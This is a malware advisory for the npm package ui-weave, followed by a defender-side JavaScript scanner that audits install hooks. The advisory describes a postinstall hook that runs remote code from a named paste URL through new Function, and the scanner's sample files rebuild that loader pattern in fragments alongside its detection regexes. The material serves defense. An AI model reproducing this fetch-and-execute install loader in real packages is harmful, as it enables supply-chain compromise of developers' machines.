OSV ID
MAL-2026-5406
Ecosystem
npm
Summary
package.json declares postinstall: node lib/utils/index.js, which spawns a detached child process running lib/utils/smtp-connection/index.js. That script fetches https://www.jsonkeeper.com/b/QHDXR and feeds the response's data.cookie field directly into new Function('require', data.cookie)(require), executing whatever JavaScript is hosted at that URL on every machine that runs npm install ui-weave. jsonkeeper.com is a public, mutable, anonymous paste host: the author can change the served payload at any time without republishing the package. The detached/unref'd spawn is intended to outlive the install command. The package additionally impersonates nodemailer: it ships nodemailer's source under lib/nodemailer.js, claims author Andris Reinman (the real nodemailer maintainer), and copies an unrelated React Training copyright string as its description, while being published under the unrelated name ui-weave with homepage ui-weave.com. The impersonation provides a veneer of legitimacy for the install-time remote-code-execution payload.
Source: amazon-inspector (ee5b1184b3208f8eee80df74c37c809f93461564a9226e1f82e1d551770d799a)
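The following is an added example of defender-side triage tooling; it is not code from the advisory, from Amazon Inspector, or from the ui-weave package. It audits a package's install-time lifecycle scripts (preinstall/install/postinstall/prepare) and follows the local script files they reference, flagging the indicators described above: a detached and unref'd child spawn, a remote fetch, and dynamic code execution via new Function or eval. The package.json and file contents are constructed in-memory samples that mirror the described layout, and the function names, indicator list and regexes are this example's own heuristics rather than anything the advisory specifies.

```javascript
'use strict';

// npm lifecycle hooks that run automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Source-code indicators used for triage. Each is a heuristic: a match is a
// reason to read the file, not proof of malice on its own.
const INDICATORS = [
  { name: 'dynamic-code-execution', re: /\bnew\s+Function\s*\(|\beval\s*\(/ },
  { name: 'remote-fetch', re: /\b(?:https?\.get|https?\.request|fetch)\s*\(/ },
  { name: 'detached-spawn', re: /detached\s*:\s*true/ },
  { name: 'unref-child', re: /\.unref\s*\(\s*\)/ },
];

// Return the lifecycle scripts in a parsed package.json that run at install time.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Extract the local .js paths a command or source text refers to
// (e.g. "node lib/x.js" or require('./y.js')).
function referencedScripts(text) {
  return text.match(/[\w./-]+\.[cm]?js\b/g) || [];
}

// Resolve a reference relative to the directory of the referencing file.
// An empty fromFile means the reference comes from package.json (package root).
function resolveRef(fromFile, ref) {
  const parts = fromFile.split('/').slice(0, -1);
  for (const seg of ref.split('/')) {
    if (seg === '.' || seg === '') continue;
    if (seg === '..') parts.pop();
    else parts.push(seg);
  }
  return parts.join('/');
}

// Return the names of every indicator present in a piece of source text.
function scanSource(src) {
  return INDICATORS.filter(({ re }) => re.test(src)).map(({ name }) => name);
}

// Audit one package. `files` maps package-relative paths to source text; in a
// real run these would be read from node_modules/<pkg>. Files reached from an
// install hook are scanned, and files they in turn reference are followed, so a
// hook that delegates to a second script (as in the advisory) is still covered.
function auditPackage(pkg, files) {
  const findings = [];
  for (const { hook, command } of findInstallHooks(pkg)) {
    const queue = referencedScripts(command).map((ref) => resolveRef('', ref));
    const seen = new Set();
    while (queue.length) {
      const file = queue.shift();
      if (seen.has(file) || !(file in files)) continue;
      seen.add(file);
      const src = files[file];
      const indicators = scanSource(src);
      if (indicators.length) findings.push({ hook, file, indicators });
      for (const ref of referencedScripts(src)) queue.push(resolveRef(file, ref));
    }
  }
  return findings;
}

// Constructed sample mirroring the layout described in the advisory. The file
// contents are illustrative fragments, not the real package's code.
const SAMPLE_PKG = {
  name: 'example-pkg',
  scripts: { postinstall: 'node lib/utils/index.js', test: 'node test.js' },
};
const SAMPLE_FILES = {
  'lib/utils/index.js': [
    "const { spawn } = require('child_process');",
    "const child = spawn(process.execPath, ['./smtp-connection/index.js'],",
    "  { detached: true, stdio: 'ignore' });",
    'child.unref();',
  ].join('\n'),
  'lib/utils/smtp-connection/index.js': [
    "const https = require('https');",
    "https.get('https://example.invalid/placeholder', (res) => {",
    "  // ... collects the body into `data`, then:",
    "  new Function('require', data.cookie)(require);",
    '});',
  ].join('\n'),
  'lib/nodemailer.js': 'module.exports = {};',
};

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

Run against a real install by reading each dependency's package.json and source files from node_modules into the `files` map; a non-empty result for a package that has no legitimate reason to run install-time scripts is the signal to pause and inspect the package before it reaches a build pipeline.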